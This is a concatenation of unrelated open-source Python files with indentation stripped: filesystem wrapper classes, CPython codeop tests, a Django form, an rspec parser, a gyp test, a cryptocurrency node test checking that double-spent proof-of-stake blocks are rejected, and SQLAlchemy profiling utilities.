def postRun(self, test, timing):
from sqlite3 import dbapi2 as sqlite
con = sqlite.connect(self.db_file)
cr = con.cursor()
timestamp = int(time.time())
load = os.getloadavg()[0]
# accumulate the test results
data = []
sum_time = 0
num = 0
parse_failed = False
# We're only interested in storing scaled data
if timing != None and test['scale_refine'] != 0:
sum_time += float(timing)
num += 1
data.append( (self.app_name, test['test_name'].split('/').pop(), self.options.revision, timestamp, timing, test['scale_refine'], load) )
# Insert the data into the database
cr.executemany('insert into timing values (?,?,?,?,?,?,?)', data)
con.commit()
class TestHarnessTester(object):
"""
Class for running TestHarness unit tests.
"""
def __init__(self, argv, *args):
self._argv = argv
def findAndRunTests(self):
"""
Execute the unittests for the TestHarness.
"""
location = os.path.join(os.path.dirname(__file__), 'unit_tests')
loader = unittest.TestLoader()
suite = loader.discover(location)
runner = unittest.TextTestRunner(verbosity=2)
self.error_code = int(not runner.run(suite).wasSuccessful())
|
DANCEcollaborative/forum-xblock
|
refs/heads/master
|
XBlock Integration Files/xdjangobb/xblock/lib/python2.7/site-packages/fs/wrapfs/__init__.py
|
13
|
"""
fs.wrapfs
=========
A class for wrapping an existing FS object with additional functionality.
This module provides the class WrapFS, a base class for objects that wrap
another FS object and provide some transformation of its contents. It could
be very useful for implementing e.g. transparent encryption or compression
services.
For a simple example of how this class could be used, see the 'HideDotFilesFS'
class in the module fs.wrapfs.hidedotfilesfs. This wrapper implements the
standard unix shell functionality of hiding dot-files in directory listings.
"""
import re
import sys
import fnmatch
import threading
from fs.base import FS, threading, synchronize, NoDefaultMeta
from fs.errors import *
from fs.path import *
from fs.local_functools import wraps
def rewrite_errors(func):
"""Re-write paths in errors raised by wrapped FS objects."""
@wraps(func)
def wrapper(self,*args,**kwds):
try:
return func(self,*args,**kwds)
except ResourceError, e:
(exc_type,exc_inst,tb) = sys.exc_info()
try:
e.path = self._decode(e.path)
except (AttributeError, ValueError, TypeError):
raise e, None, tb
raise
return wrapper
class WrapFS(FS):
"""FS that wraps another FS, providing translation etc.
This class allows simple transforms to be applied to the names
and/or contents of files in an FS. It could be used to implement
e.g. compression or encryption in a relatively painless manner.
The following methods can be overridden to control how files are
accessed in the underlying FS object:
* _file_wrap(file, mode): called for each file that is opened from
the underlying FS; may return a modified
file-like object.
* _encode(path): encode a path for access in the underlying FS
* _decode(path): decode a path from the underlying FS
If the required path translation proceeds one component at a time,
it may be simpler to override the _encode_name() and _decode_name()
methods.
"""
def __init__(self, fs):
super(WrapFS, self).__init__()
try:
self._lock = fs._lock
except (AttributeError,FSError):
self._lock = threading.RLock()
self.wrapped_fs = fs
def _file_wrap(self, f, mode):
"""Apply wrapping to an opened file."""
return f
def _encode_name(self, name):
"""Encode path component for the underlying FS."""
return name
def _decode_name(self, name):
"""Decode path component from the underlying FS."""
return name
def _encode(self, path):
"""Encode path for the underlying FS."""
e_names = []
for name in iteratepath(path):
if name == "":
e_names.append("")
else:
e_names.append(self._encode_name(name))
return "/".join(e_names)
def _decode(self, path):
"""Decode path from the underlying FS."""
d_names = []
for name in iteratepath(path):
if name == "":
d_names.append("")
else:
d_names.append(self._decode_name(name))
return "/".join(d_names)
def _adjust_mode(self, mode):
"""Adjust the mode used to open a file in the underlying FS.
This method takes the mode given when opening a file, and should
return a two-tuple giving the mode to be used in this FS as first
item, and the mode to be used in the underlying FS as the second.
An example of why this is needed is a WrapFS subclass that does
transparent file compression - in this case files from the wrapped
FS cannot be opened in append mode.
"""
return (mode, mode)
def __unicode__(self):
return u"<%s: %s>" % (self.__class__.__name__,self.wrapped_fs,)
#def __str__(self):
# return unicode(self).encode(sys.getdefaultencoding(),"replace")
@rewrite_errors
def getmeta(self, meta_name, default=NoDefaultMeta):
return self.wrapped_fs.getmeta(meta_name, default)
@rewrite_errors
def hasmeta(self, meta_name):
return self.wrapped_fs.hasmeta(meta_name)
@rewrite_errors
def validatepath(self, path):
return self.wrapped_fs.validatepath(self._encode(path))
@rewrite_errors
def getsyspath(self, path, allow_none=False):
return self.wrapped_fs.getsyspath(self._encode(path), allow_none)
@rewrite_errors
def getpathurl(self, path, allow_none=False):
return self.wrapped_fs.getpathurl(self._encode(path), allow_none)
@rewrite_errors
def hassyspath(self, path):
return self.wrapped_fs.hassyspath(self._encode(path))
@rewrite_errors
def open(self, path, mode='r', **kwargs):
(mode, wmode) = self._adjust_mode(mode)
f = self.wrapped_fs.open(self._encode(path), wmode, **kwargs)
return self._file_wrap(f, mode)
@rewrite_errors
def setcontents(self, path, data, encoding=None, errors=None, chunk_size=64*1024):
# We can't pass setcontents() through to the wrapped FS if the
# wrapper has defined a _file_wrap method, as it would bypass
# the file contents wrapping.
#if self._file_wrap.im_func is WrapFS._file_wrap.im_func:
if getattr(self.__class__, '_file_wrap', None) is getattr(WrapFS, '_file_wrap', None):
return self.wrapped_fs.setcontents(self._encode(path), data, encoding=encoding, errors=errors, chunk_size=chunk_size)
else:
return super(WrapFS, self).setcontents(path, data, encoding=encoding, errors=errors, chunk_size=chunk_size)
@rewrite_errors
def createfile(self, path, wipe=False):
return self.wrapped_fs.createfile(self._encode(path), wipe=wipe)
@rewrite_errors
def exists(self, path):
return self.wrapped_fs.exists(self._encode(path))
@rewrite_errors
def isdir(self, path):
return self.wrapped_fs.isdir(self._encode(path))
@rewrite_errors
def isfile(self, path):
return self.wrapped_fs.isfile(self._encode(path))
@rewrite_errors
def listdir(self, path="", wildcard=None, full=False, absolute=False, dirs_only=False, files_only=False):
kwds = dict(wildcard=wildcard,
full=full,
absolute=absolute,
dirs_only=dirs_only,
files_only=files_only)
full = kwds.pop("full",False)
absolute = kwds.pop("absolute",False)
wildcard = kwds.pop("wildcard",None)
if wildcard is None:
wildcard = lambda fn:True
elif not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
entries = []
enc_path = self._encode(path)
for e in self.wrapped_fs.listdir(enc_path,**kwds):
e = basename(self._decode(pathcombine(enc_path,e)))
if not wildcard(e):
continue
if full:
e = pathcombine(path,e)
elif absolute:
e = abspath(pathcombine(path,e))
entries.append(e)
return entries
@rewrite_errors
def ilistdir(self, path="", wildcard=None, full=False, absolute=False, dirs_only=False, files_only=False):
kwds = dict(wildcard=wildcard,
full=full,
absolute=absolute,
dirs_only=dirs_only,
files_only=files_only)
full = kwds.pop("full",False)
absolute = kwds.pop("absolute",False)
wildcard = kwds.pop("wildcard",None)
if wildcard is None:
wildcard = lambda fn:True
elif not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
enc_path = self._encode(path)
for e in self.wrapped_fs.ilistdir(enc_path,**kwds):
e = basename(self._decode(pathcombine(enc_path,e)))
if not wildcard(e):
continue
if full:
e = pathcombine(path,e)
elif absolute:
e = abspath(pathcombine(path,e))
yield e
@rewrite_errors
def listdirinfo(self, path="", wildcard=None, full=False, absolute=False, dirs_only=False, files_only=False):
kwds = dict(wildcard=wildcard,
full=full,
absolute=absolute,
dirs_only=dirs_only,
files_only=files_only)
full = kwds.pop("full",False)
absolute = kwds.pop("absolute",False)
wildcard = kwds.pop("wildcard",None)
if wildcard is None:
wildcard = lambda fn:True
elif not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
entries = []
enc_path = self._encode(path)
for (nm,info) in self.wrapped_fs.listdirinfo(enc_path,**kwds):
nm = basename(self._decode(pathcombine(enc_path,nm)))
if not wildcard(nm):
continue
if full:
nm = pathcombine(path,nm)
elif absolute:
nm = abspath(pathcombine(path,nm))
entries.append((nm,info))
return entries
@rewrite_errors
def ilistdirinfo(self, path="", wildcard=None, full=False, absolute=False, dirs_only=False, files_only=False):
kwds = dict(wildcard=wildcard,
full=full,
absolute=absolute,
dirs_only=dirs_only,
files_only=files_only)
full = kwds.pop("full",False)
absolute = kwds.pop("absolute",False)
wildcard = kwds.pop("wildcard",None)
if wildcard is None:
wildcard = lambda fn:True
elif not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
enc_path = self._encode(path)
for (nm,info) in self.wrapped_fs.ilistdirinfo(enc_path,**kwds):
nm = basename(self._decode(pathcombine(enc_path,nm)))
if not wildcard(nm):
continue
if full:
nm = pathcombine(path,nm)
elif absolute:
nm = abspath(pathcombine(path,nm))
yield (nm,info)
@rewrite_errors
def walk(self,path="/",wildcard=None,dir_wildcard=None,search="breadth",ignore_errors=False):
if dir_wildcard is not None:
# If there is a dir_wildcard, fall back to the default impl
# that uses listdir(). Otherwise we run the risk of enumerating
# lots of directories that will just be thrown away.
for item in super(WrapFS,self).walk(path,wildcard,dir_wildcard,search,ignore_errors):
yield item
# Otherwise, the wrapped FS may provide a more efficient impl
# which we can use directly.
else:
if wildcard is not None and not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
for (dirpath,filepaths) in self.wrapped_fs.walk(self._encode(path),search=search,ignore_errors=ignore_errors):
filepaths = [basename(self._decode(pathcombine(dirpath,p)))
for p in filepaths]
dirpath = abspath(self._decode(dirpath))
if wildcard is not None:
filepaths = [p for p in filepaths if wildcard(p)]
yield (dirpath,filepaths)
@rewrite_errors
def walkfiles(self,path="/",wildcard=None,dir_wildcard=None,search="breadth",ignore_errors=False):
if dir_wildcard is not None:
# If there is a dir_wildcard, fall back to the default impl
# that uses listdir(). Otherwise we run the risk of enumerating
# lots of directories that will just be thrown away.
for item in super(WrapFS,self).walkfiles(path,wildcard,dir_wildcard,search,ignore_errors):
yield item
# Otherwise, the wrapped FS may provide a more efficient impl
# which we can use directly.
else:
if wildcard is not None and not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
for filepath in self.wrapped_fs.walkfiles(self._encode(path),search=search,ignore_errors=ignore_errors):
filepath = abspath(self._decode(filepath))
if wildcard is not None:
if not wildcard(basename(filepath)):
continue
yield filepath
@rewrite_errors
def walkdirs(self,path="/",wildcard=None,search="breadth",ignore_errors=False):
if wildcard is not None:
# If there is a wildcard, fall back to the default impl
# that uses listdir(). Otherwise we run the risk of enumerating
# lots of directories that will just be thrown away.
for item in super(WrapFS,self).walkdirs(path,wildcard,search,ignore_errors):
yield item
# Otherwise, the wrapped FS may provide a more efficient impl
# which we can use directly.
else:
for dirpath in self.wrapped_fs.walkdirs(self._encode(path),search=search,ignore_errors=ignore_errors):
yield abspath(self._decode(dirpath))
@rewrite_errors
def makedir(self, path, *args, **kwds):
return self.wrapped_fs.makedir(self._encode(path),*args,**kwds)
@rewrite_errors
def remove(self, path):
return self.wrapped_fs.remove(self._encode(path))
@rewrite_errors
def removedir(self, path, *args, **kwds):
return self.wrapped_fs.removedir(self._encode(path),*args,**kwds)
@rewrite_errors
def rename(self, src, dst):
return self.wrapped_fs.rename(self._encode(src),self._encode(dst))
@rewrite_errors
def getinfo(self, path):
return self.wrapped_fs.getinfo(self._encode(path))
@rewrite_errors
def settimes(self, path, *args, **kwds):
return self.wrapped_fs.settimes(self._encode(path), *args,**kwds)
@rewrite_errors
def desc(self, path):
return self.wrapped_fs.desc(self._encode(path))
@rewrite_errors
def copy(self, src, dst, **kwds):
return self.wrapped_fs.copy(self._encode(src),self._encode(dst),**kwds)
@rewrite_errors
def move(self, src, dst, **kwds):
return self.wrapped_fs.move(self._encode(src),self._encode(dst),**kwds)
@rewrite_errors
def movedir(self, src, dst, **kwds):
return self.wrapped_fs.movedir(self._encode(src),self._encode(dst),**kwds)
@rewrite_errors
def copydir(self, src, dst, **kwds):
return self.wrapped_fs.copydir(self._encode(src),self._encode(dst),**kwds)
@rewrite_errors
def getxattr(self, path, name, default=None):
try:
return self.wrapped_fs.getxattr(self._encode(path),name,default)
except AttributeError:
raise UnsupportedError("getxattr")
@rewrite_errors
def setxattr(self, path, name, value):
try:
return self.wrapped_fs.setxattr(self._encode(path),name,value)
except AttributeError:
raise UnsupportedError("setxattr")
@rewrite_errors
def delxattr(self, path, name):
try:
return self.wrapped_fs.delxattr(self._encode(path),name)
except AttributeError:
raise UnsupportedError("delxattr")
@rewrite_errors
def listxattrs(self, path):
try:
return self.wrapped_fs.listxattrs(self._encode(path))
except AttributeError:
raise UnsupportedError("listxattrs")
def __getattr__(self, attr):
# These attributes can be used by the destructor, but may not be
# defined if there are errors in the constructor.
if attr == "closed":
return False
if attr == "wrapped_fs":
return None
if attr.startswith("_"):
raise AttributeError(attr)
return getattr(self.wrapped_fs,attr)
@rewrite_errors
def close(self):
if not self.closed:
self.wrapped_fs.close()
super(WrapFS,self).close()
self.wrapped_fs = None
def wrap_fs_methods(decorator, cls=None, exclude=[]):
"""Apply the given decorator to all FS methods on the given class.
This function can be used in two ways. When called with two arguments it
applies the given function 'decorator' to each FS method of the given
class. When called with just a single argument, it creates and returns
a class decorator which will do the same thing when applied. So you can
use it like this::
wrap_fs_methods(mydecorator,MyFSClass)
Or on more recent Python versions, like this::
@wrap_fs_methods(mydecorator)
class MyFSClass(FS):
...
"""
def apply_decorator(cls):
for method_name in wrap_fs_methods.method_names:
if method_name in exclude:
continue
method = getattr(cls,method_name,None)
if method is not None:
setattr(cls,method_name,decorator(method))
return cls
if cls is not None:
return apply_decorator(cls)
else:
return apply_decorator
wrap_fs_methods.method_names = ["open","exists","isdir","isfile","listdir",
"makedir","remove","setcontents","removedir","rename","getinfo","copy",
"move","copydir","movedir","close","getxattr","setxattr","delxattr",
"listxattrs","validatepath","getsyspath","createfile", "hasmeta", "getmeta","listdirinfo",
"ilistdir","ilistdirinfo"]
|
mancoast/CPythonPyc_test
|
refs/heads/master
|
fail/321_test_codeop.py
|
53
|
"""
Test cases for codeop.py
Nick Mathewson
"""
import unittest
from test.support import run_unittest, is_jython
from codeop import compile_command, PyCF_DONT_IMPLY_DEDENT
import io
if is_jython:
import sys
def unify_callables(d):
for n,v in d.items():
if hasattr(v, '__call__'):
d[n] = True
return d
class CodeopTests(unittest.TestCase):
def assertValid(self, str, symbol='single'):
'''succeed iff str is a valid piece of code'''
if is_jython:
code = compile_command(str, "<input>", symbol)
self.assertTrue(code)
if symbol == "single":
d,r = {},{}
saved_stdout = sys.stdout
sys.stdout = io.StringIO()
try:
exec(code, d)
exec(compile(str,"<input>","single"), r)
finally:
sys.stdout = saved_stdout
elif symbol == 'eval':
ctx = {'a': 2}
d = { 'value': eval(code,ctx) }
r = { 'value': eval(str,ctx) }
self.assertEqual(unify_callables(r),unify_callables(d))
else:
expected = compile(str, "<input>", symbol, PyCF_DONT_IMPLY_DEDENT)
self.assertEqual(compile_command(str, "<input>", symbol), expected)
def assertIncomplete(self, str, symbol='single'):
'''succeed iff str is the start of a valid piece of code'''
self.assertEqual(compile_command(str, symbol=symbol), None)
def assertInvalid(self, str, symbol='single', is_syntax=1):
'''succeed iff str is the start of an invalid piece of code'''
try:
compile_command(str,symbol=symbol)
self.fail("No exception thrown for invalid code")
except SyntaxError:
self.assertTrue(is_syntax)
except OverflowError:
self.assertTrue(not is_syntax)
def test_valid(self):
av = self.assertValid
# special case
if not is_jython:
self.assertEqual(compile_command(""),
compile("pass", "<input>", 'single',
PyCF_DONT_IMPLY_DEDENT))
self.assertEqual(compile_command("\n"),
compile("pass", "<input>", 'single',
PyCF_DONT_IMPLY_DEDENT))
else:
av("")
av("\n")
av("a = 1")
av("\na = 1")
av("a = 1\n")
av("a = 1\n\n")
av("\n\na = 1\n\n")
av("def x():\n pass\n")
av("if 1:\n pass\n")
av("\n\nif 1: pass\n")
av("\n\nif 1: pass\n\n")
av("def x():\n\n pass\n")
av("def x():\n pass\n \n")
av("def x():\n pass\n \n")
av("pass\n")
av("3**3\n")
av("if 9==3:\n pass\nelse:\n pass\n")
av("if 1:\n pass\n if 1:\n pass\n else:\n pass\n")
av("#a\n#b\na = 3\n")
av("#a\n\n \na=3\n")
av("a=3\n\n")
av("a = 9+ \\\n3")
av("3**3","eval")
av("(lambda z: \n z**3)","eval")
av("9+ \\\n3","eval")
av("9+ \\\n3\n","eval")
av("\n\na**3","eval")
av("\n \na**3","eval")
av("#a\n#b\na**3","eval")
av("\n\na = 1\n\n")
av("\n\nif 1: a=1\n\n")
av("if 1:\n pass\n if 1:\n pass\n else:\n pass\n")
av("#a\n\n \na=3\n\n")
av("\n\na**3","eval")
av("\n \na**3","eval")
av("#a\n#b\na**3","eval")
av("def f():\n try: pass\n finally: [x for x in (1,2)]\n")
av("def f():\n pass\n#foo\n")
av("@a.b.c\ndef f():\n pass\n")
def test_incomplete(self):
ai = self.assertIncomplete
ai("(a **")
ai("(a,b,")
ai("(a,b,(")
ai("(a,b,(")
ai("a = (")
ai("a = {")
ai("b + {")
ai("if 9==3:\n pass\nelse:")
ai("if 9==3:\n pass\nelse:\n")
ai("if 9==3:\n pass\nelse:\n pass")
ai("if 1:")
ai("if 1:\n")
ai("if 1:\n pass\n if 1:\n pass\n else:")
ai("if 1:\n pass\n if 1:\n pass\n else:\n")
ai("if 1:\n pass\n if 1:\n pass\n else:\n pass")
ai("def x():")
ai("def x():\n")
ai("def x():\n\n")
ai("def x():\n pass")
ai("def x():\n pass\n ")
ai("def x():\n pass\n ")
ai("\n\ndef x():\n pass")
ai("a = 9+ \\")
ai("a = 'a\\")
ai("a = '''xy")
ai("","eval")
ai("\n","eval")
ai("(","eval")
ai("(\n\n\n","eval")
ai("(9+","eval")
ai("9+ \\","eval")
ai("lambda z: \\","eval")
ai("if True:\n if True:\n if True: \n")
ai("@a(")
ai("@a(b")
ai("@a(b,")
ai("@a(b,c")
ai("@a(b,c,")
ai("from a import (")
ai("from a import (b")
ai("from a import (b,")
ai("from a import (b,c")
ai("from a import (b,c,")
ai("[");
ai("[a");
ai("[a,");
ai("[a,b");
ai("[a,b,");
ai("{");
ai("{a");
ai("{a:");
ai("{a:b");
ai("{a:b,");
ai("{a:b,c");
ai("{a:b,c:");
ai("{a:b,c:d");
ai("{a:b,c:d,");
ai("a(")
ai("a(b")
ai("a(b,")
ai("a(b,c")
ai("a(b,c,")
ai("a[")
ai("a[b")
ai("a[b,")
ai("a[b:")
ai("a[b:c")
ai("a[b:c:")
ai("a[b:c:d")
ai("def a(")
ai("def a(b")
ai("def a(b,")
ai("def a(b,c")
ai("def a(b,c,")
ai("(")
ai("(a")
ai("(a,")
ai("(a,b")
ai("(a,b,")
ai("if a:\n pass\nelif b:")
ai("if a:\n pass\nelif b:\n pass\nelse:")
ai("while a:")
ai("while a:\n pass\nelse:")
ai("for a in b:")
ai("for a in b:\n pass\nelse:")
ai("try:")
ai("try:\n pass\nexcept:")
ai("try:\n pass\nfinally:")
ai("try:\n pass\nexcept:\n pass\nfinally:")
ai("with a:")
ai("with a as b:")
ai("class a:")
ai("class a(")
ai("class a(b")
ai("class a(b,")
ai("class a():")
ai("[x for")
ai("[x for x in")
ai("[x for x in (")
ai("(x for")
ai("(x for x in")
ai("(x for x in (")
def test_invalid(self):
ai = self.assertInvalid
ai("a b")
ai("a @")
ai("a b @")
ai("a ** @")
ai("a = ")
ai("a = 9 +")
ai("def x():\n\npass\n")
ai("\n\n if 1: pass\n\npass")
ai("a = 9+ \\\n")
ai("a = 'a\\ ")
ai("a = 'a\\\n")
ai("a = 1","eval")
ai("a = (","eval")
ai("]","eval")
ai("())","eval")
ai("[}","eval")
ai("9+","eval")
ai("lambda z:","eval")
ai("a b","eval")
ai("return 2.3")
ai("if (a == 1 and b = 2): pass")
ai("del 1")
ai("del ()")
ai("del (1,)")
ai("del [1]")
ai("del '1'")
ai("[i for i in range(10)] = (1, 2, 3)")
def test_filename(self):
self.assertEqual(compile_command("a = 1\n", "abc").co_filename,
compile("a = 1\n", "abc", 'single').co_filename)
self.assertNotEqual(compile_command("a = 1\n", "abc").co_filename,
compile("a = 1\n", "def", 'single').co_filename)
def test_main():
run_unittest(CodeopTests)
if __name__ == "__main__":
test_main()
|
uclouvain/osis_louvain
|
refs/heads/master
|
base/forms/learning_achievement.py
|
1
|
##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2018 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from ckeditor.widgets import CKEditorWidget
from django import forms
from base.models.learning_achievement import LearningAchievement, search
from reference.models import language
from reference.models.language import EN_CODE_LANGUAGE, FR_CODE_LANGUAGE
class LearningAchievementEditForm(forms.ModelForm):
text = forms.CharField(widget=CKEditorWidget(config_name='minimal'), required=False)
class Meta:
model = LearningAchievement
fields = ['code_name', 'text']
def __init__(self, data=None, initial=None, **kwargs):
initial = initial or {}
if data and data.get('language_code'):
initial['language'] = language.find_by_code(data.get('language_code'))
super().__init__(data, initial=initial, **kwargs)
self._get_code_name_disabled_status()
for key, value in initial.items():
setattr(self.instance, key, value)
def _get_code_name_disabled_status(self):
if self.instance.pk and self.instance.language.code == EN_CODE_LANGUAGE:
self.fields["code_name"].disabled = True
def save(self, commit=True):
instance = super().save(commit)
learning_achievement_other_language = search(instance.learning_unit_year,
instance.order)
if learning_achievement_other_language:
learning_achievement_other_language.update(code_name=instance.code_name)
# FIXME : We must have an English entry for each French entry
# Needs a refactoring of its model to include all languages in a single row.
if instance.language == language.find_by_code(FR_CODE_LANGUAGE):
LearningAchievement.objects.get_or_create(learning_unit_year=instance.learning_unit_year,
code_name=instance.code_name,
language=language.find_by_code(EN_CODE_LANGUAGE))
return instance
|
dana-i2cat/felix
|
refs/heads/master
|
ofam/src/src/foam/sfa/rspecs/elements/versions/nitosv1Channel.py
|
3
|
from foam.sfa.util.sfalogging import logger
from foam.sfa.util.xml import XpathFilter
from foam.sfa.util.xrn import Xrn
from foam.sfa.rspecs.elements.element import Element
from foam.sfa.rspecs.elements.node import Node
from foam.sfa.rspecs.elements.sliver import Sliver
from foam.sfa.rspecs.elements.location import Location
from foam.sfa.rspecs.elements.hardware_type import HardwareType
from foam.sfa.rspecs.elements.disk_image import DiskImage
from foam.sfa.rspecs.elements.interface import Interface
from foam.sfa.rspecs.elements.bwlimit import BWlimit
from foam.sfa.rspecs.elements.pltag import PLTag
from foam.sfa.rspecs.elements.versions.nitosv1Sliver import NITOSv1Sliver
from foam.sfa.rspecs.elements.versions.nitosv1PLTag import NITOSv1PLTag
from foam.sfa.rspecs.elements.versions.pgv2Services import PGv2Services
from foam.sfa.rspecs.elements.lease import Lease
from foam.sfa.rspecs.elements.spectrum import Spectrum
from foam.sfa.rspecs.elements.channel import Channel
class NITOSv1Channel:
@staticmethod
def add_channels(xml, channels):
network_elems = xml.xpath('//network')
if len(network_elems) > 0:
network_elem = network_elems[0]
elif len(channels) > 0:
# dirty hack that handles no resource manifest rspec
network_urn = "omf"
network_elem = xml.add_element('network', name = network_urn)
else:
network_elem = xml
# spectrum_elems = xml.xpath('//spectrum')
# spectrum_elem = xml.add_element('spectrum')
# if len(spectrum_elems) > 0:
# spectrum_elem = spectrum_elems[0]
# elif len(channels) > 0:
# spectrum_elem = xml.add_element('spectrum')
# else:
# spectrum_elem = xml
spectrum_elem = network_elem.add_instance('spectrum', [])
channel_elems = []
for channel in channels:
channel_fields = ['channel_num', 'frequency', 'standard']
channel_elem = spectrum_elem.add_instance('channel', channel, channel_fields)
channel_elems.append(channel_elem)
@staticmethod
def get_channels(xml, filter={}):
xpath = '//channel%s | //default:channel%s' % (XpathFilter.xpath(filter), XpathFilter.xpath(filter))
channel_elems = xml.xpath(xpath)
return NITOSv1Channel.get_channel_objs(channel_elems)
@staticmethod
def get_channel_objs(channel_elems):
channels = []
for channel_elem in channel_elems:
channel = Channel(channel_elem.attrib, channel_elem)
channel['channel_num'] = channel_elem.attrib['channel_num']
channel['frequency'] = channel_elem.attrib['frequency']
channel['standard'] = channel_elem.attrib['standard']
channels.append(channel)
return channels
|
mgamer/gyp
|
refs/heads/master
|
test/gyp-defines/gyptest-regyp.py
|
268
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that when the same value is repeated for a gyp define, duplicates are
stripped from the regeneration rule.
"""
import os
import TestGyp
# Regenerating build files when a gyp file changes is currently only supported
# by the make generator.
test = TestGyp.TestGyp(formats=['make'])
os.environ['GYP_DEFINES'] = 'key=repeated_value key=value1 key=repeated_value'
test.run_gyp('defines.gyp')
test.build('defines.gyp')
# The last occurrence of a repeated set should take precedence over other
# values. See gyptest-multiple-values.py.
test.must_contain('action.txt', 'repeated_value')
# So the regeneration rule needs to use the correct order.
test.must_not_contain(
'Makefile', '"-Dkey=repeated_value" "-Dkey=value1" "-Dkey=repeated_value"')
test.must_contain('Makefile', '"-Dkey=value1" "-Dkey=repeated_value"')
# Sleep so that the changed gyp file will have a newer timestamp than the
# previously generated build files.
test.sleep()
os.utime("defines.gyp", None)
test.build('defines.gyp')
test.must_contain('action.txt', 'repeated_value')
test.pass_test()
|
CooloiStudio/Report_deskxd_com
|
refs/heads/master
|
report_deskxd_com/wsgi.py
|
1
|
"""
WSGI config for report_deskxd_com project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "report_deskxd_com.settings")
application = get_wsgi_application()
|
cevap/ion
|
refs/heads/master
|
test/functional/p2p_pos_doublespend.py
|
1
|
#!/usr/bin/env python3
# Copyright (c) 2019 The PIVX Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Covers the scenario of a valid PoS block with a valid coinstake transaction where the
coinstake input prevout is double spent in one of the other transactions in the same block.
'''
from time import sleep
from fake_stake.base_test import ION_FakeStakeTest
class PoSDoubleSpend(ION_FakeStakeTest):
def run_test(self):
self.description = "Covers the scenario of a valid PoS block with a valid coinstake transaction where the coinstake input prevout is double spent in one of the other transactions in the same block."
self.init_test()
INITIAL_MINED_BLOCKS = 300
FORK_DEPTH = 30
self.NUM_BLOCKS = 3
# 1) Start by mining blocks
self.log.info("Mining %d blocks..." % INITIAL_MINED_BLOCKS)
self.node.generate(INITIAL_MINED_BLOCKS)
# 2) Collect the possible prevouts
self.log.info("Collecting all unspent coins which we generated from mining...")
staking_utxo_list = self.node.listunspent()
# 3) Spam Blocks on the main chain
self.log.info("-- Main chain blocks first")
self.test_spam("Main", staking_utxo_list, fDoubleSpend=True)
sleep(2)
# 4) Mine some block as buffer
self.log.info("Mining %d more blocks..." % FORK_DEPTH)
self.node.generate(FORK_DEPTH)
sleep(2)
# 5) Spam Blocks on a forked chain
self.log.info("-- Forked chain blocks now")
err_msgs = self.test_spam("Forked", staking_utxo_list, fRandomHeight=True, randomRange=FORK_DEPTH, fDoubleSpend=True)
if not len(err_msgs) == 0:
self.log.error("result: " + " | ".join(err_msgs))
raise AssertionError("TEST FAILED")
self.log.info("%s PASSED" % self.__class__.__name__)
if __name__ == '__main__':
PoSDoubleSpend().main()
|
h3llrais3r/SickRage
|
refs/heads/master
|
lib/sqlalchemy/testing/profiling.py
|
76
|
# testing/profiling.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Profiling support for unit and performance tests.
These are special purpose profiling methods which operate
in a more fine-grained way than nose's profiling plugin.
"""
import os
import sys
from .util import gc_collect, decorator
from . import config
from .plugin.plugin_base import SkipTest
import pstats
import time
import collections
from .. import util
try:
import cProfile
except ImportError:
cProfile = None
from ..util import jython, pypy, win32, update_wrapper
_current_test = None
def profiled(target=None, **target_opts):
"""Function profiling.
@profiled()
or
@profiled(report=True, sort=('calls',), limit=20)
Outputs profiling info for a decorated function.
"""
profile_config = {'targets': set(),
'report': True,
'print_callers': False,
'print_callees': False,
'graphic': False,
'sort': ('time', 'calls'),
'limit': None}
if target is None:
target = 'anonymous_target'
@decorator
def decorate(fn, *args, **kw):
elapsed, load_stats, result = _profile(
fn, *args, **kw)
graphic = target_opts.get('graphic', profile_config['graphic'])
if graphic:
os.system("runsnake %s" % filename)
else:
report = target_opts.get('report', profile_config['report'])
if report:
sort_ = target_opts.get('sort', profile_config['sort'])
limit = target_opts.get('limit', profile_config['limit'])
print(("Profile report for target '%s'" % (
target, )
))
stats = load_stats()
stats.sort_stats(*sort_)
if limit:
stats.print_stats(limit)
else:
stats.print_stats()
print_callers = target_opts.get(
'print_callers', profile_config['print_callers'])
if print_callers:
stats.print_callers()
print_callees = target_opts.get(
'print_callees', profile_config['print_callees'])
if print_callees:
stats.print_callees()
return result
return decorate
class ProfileStatsFile(object):
""""Store per-platform/fn profiling results in a file.
We're still targeting Py2.5, 2.4 on 0.7 with no dependencies,
so no json lib :( need to roll something silly
"""
def __init__(self, filename):
self.write = (
config.options is not None and
config.options.write_profiles
)
self.fname = os.path.abspath(filename)
self.short_fname = os.path.split(self.fname)[-1]
self.data = collections.defaultdict(
lambda: collections.defaultdict(dict))
self._read()
if self.write:
